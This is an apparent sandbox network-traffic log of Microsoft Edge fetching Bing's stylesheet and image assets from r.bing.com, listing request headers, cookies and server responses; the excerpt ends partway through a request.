Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 410
Content-Type: text/css
Content-Encoding: br
Content-MD5: kIdnI9qrJP76HGdbY3bmeg==
Last-Modified: Tue, 24 Sep 2024 07:06:01 GMT
ETag: 0x8DCDC67594E29DD
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f87cd8d3-401e-0052-5fbe-15f762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=266219
Expires: Tue, 08 Oct 2024 18:02:28 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f09749b
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/10hV_LeOgcPE0OV6RmTIShvXtbQ.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/10hV_LeOgcPE0OV6RmTIShvXtbQ.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 1081
Content-Type: text/css
Content-Encoding: br
Content-MD5: Z6i7oNyhWQeV9lMWuOEpDg==
Last-Modified: Tue, 24 Sep 2024 05:41:39 GMT
ETag: 0x8DCDC5B8FAFBC65
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 418d75c6-801e-0022-35f8-1684a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=401137
Expires: Thu, 10 Oct 2024 07:31:06 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f09761d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/oovQ50wVYon598L2kxn0rbVAI0k.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/oovQ50wVYon598L2kxn0rbVAI0k.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 83
Content-Type: text/css
Content-Encoding: br
Content-MD5: 9zayuMRBIdRggpOy0DlNzQ==
Last-Modified: Tue, 24 Sep 2024 07:00:25 GMT
ETag: 0x8DCDC66911794FA
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 94055ccf-c01e-0025-2f5d-167223000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=334697
Expires: Wed, 09 Oct 2024 13:03:46 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097871
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/nORphXiTbdMbmmQtnuvni4eWmC0.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/nORphXiTbdMbmmQtnuvni4eWmC0.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 604
Content-Type: text/css
Content-Encoding: gzip
Content-MD5: pBkK3Ubqrzs5NCwRz225Tw==
Last-Modified: Tue, 24 Sep 2024 06:58:09 GMT
ETag: 0x8DCDC663F857E9A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0f7fc4f2-201e-0042-6af3-16c184000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=398893
Expires: Thu, 10 Oct 2024 06:53:46 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f097a47
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 282
Content-Type: image/svg+xml
Content-MD5: 44eVtjQVTsH/Qca82lTuUg==
Last-Modified: Tue, 24 Sep 2024 06:05:25 GMT
ETag: 0x8DCDC5EE1BFCC0A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1f846c0e-401e-003f-1e97-155d4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=249281
Expires: Tue, 08 Oct 2024 13:20:14 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099569
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 3791
Content-Type: image/jpeg
Content-MD5: KZpHmi9/HzDQlUXKjMXRYg==
Last-Modified: Tue, 24 Sep 2024 06:49:39 GMT
ETag: 0x8DCDC650FC3D927
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 23963dd2-101e-0068-37b6-15b4c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=262713
Expires: Tue, 08 Oct 2024 17:04:06 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f0999b3
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 5944
Content-Type: image/jpeg
Content-MD5: 9ucNopg0mtlCFfC0podQNw==
Last-Modified: Tue, 27 Dec 2022 02:26:51 GMT
ETag: 0x8DAE7B1D07479D4
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4e99cab4-b01e-0064-0205-ecf534000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=139811
Expires: Mon, 07 Oct 2024 06:55:44 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099a97
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cRvrvrUA03NVEig8SXhQtErnYaM.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/cRvrvrUA03NVEig8SXhQtErnYaM.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 124
Content-Type: text/css
Content-Encoding: br
Content-MD5: y1jBAhf1/ixm6cXEZu+uGQ==
Last-Modified: Tue, 24 Sep 2024 06:41:40 GMT
ETag: 0x8DCDC63F2456305
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 44623b4a-d01e-0013-2019-16df71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=305331
Expires: Wed, 09 Oct 2024 04:54:40 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f099bb1
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rb/4O/cc,nc/snnSLSAwgsOSJF1HZbQVd81R95o.css?bu=AqASrRI&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/4O/cc,nc/snnSLSAwgsOSJF1HZbQVd81R95o.css?bu=AqASrRI&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
